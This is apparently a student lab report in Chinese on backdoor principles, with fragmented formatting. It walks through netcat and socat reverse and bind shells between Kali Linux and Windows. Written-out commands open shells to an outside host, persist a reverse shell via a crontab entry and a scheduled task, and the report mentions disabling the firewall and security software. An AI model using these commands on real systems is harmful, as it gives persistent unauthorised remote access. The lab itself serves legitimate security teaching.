不经过正常认证流程而访问系统的通道。
还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。
概念和木马有重叠
NC
或netcat
:是一个底层工具,进行基本的TCP
UDP
数据收发。常被与其他工具结合使用,起到后门的作用。
Linux
: 一般自带netcat
,"man netcat
" 或"man nc
"可查看其使用说明。Windows
: 课程主页附件中下载ncat.rar
解压即可使用。Mac
: 系统自带,"man nc
",查看其使用说明。
C:\Users\S2
中,这样命令行中直接进入即可)Windows+r
输入cmd
打开命令行,输入ipconfig
查看主机IP地址nc
所在文件夹中,输入ncat.exe -l -p <端口号>
,如图:kali
终端中输入nc <主机IP地址> <之前输入的端口号> -e /bin/sh
,如图:windows
下获得一个linux shell
,可运行任何指令,如ls
,pwd
ip add
查看Linux
的IP地址nc -l -p <端口号>
,使其处于监听状态ncat.exe -e cmd.exe ip_of_linux <之前输入的端口号>
ncat.exe -l 5227
监听5227
端口crontab -e
编辑一条定时任务,之后选择编辑器3
,在底行插入30 * * * * /bin/netcat 192.168.171.1 5227 -e /bin/sh
,即在每个小时的第30分钟反向连接主机的5227
端口。socat.rar
,然后解压到自选路径。右键
->计算机管理
->任务计划程序
->创建任务
常规
选项卡中填写任务名称( 这里我起名为zxysocat
),然后在触发器
选项卡中新建触发器,参照下图选择:操作
选项卡中,选择新建操作
,设置中程序或脚本处
选中你所下载解压的socat.exe
的路径,在添加参数中填入tcp-listen:<端口号> exec:cmd.exe,pty,stderr
,即将cmd.exe
绑定到该端口号,同时把cmd.exe
的stderr
重定向stdout
上。socat - tcp:<主机IP>:<之前输入的端口号>
,其中-
表示标准输入/出,第二个流连接到主机的相应端口。之后发现已经成功获得一个cmd Shell
Linux
的IP地址,ifconfig
命令无法找到,如图:ifconfig
命令相关的工具包,上网搜索之后该命令在net-tools
中,apt-get install net-tools
后显示该工具包已经安装,如图:之后经过发现一篇博文发现ifconfig
命令已经被逐渐淘汰,建议选用ip add
命令,果真查到了IP地址结果在此。
关闭防火墙,卸载安全软件后,Linux成功进入Windows Shell,结果在此。
描述:未安装execstack,如图:
sudo apt-get update
和sudo apt-get install execstack
等待片刻即可。##### 3.4 问题4
2019-2020-2 20175227张雪莹《网络对抗技术》 Exp2 后门原理与实践
原文:https://www.cnblogs.com/zxy20175227/p/12453642.html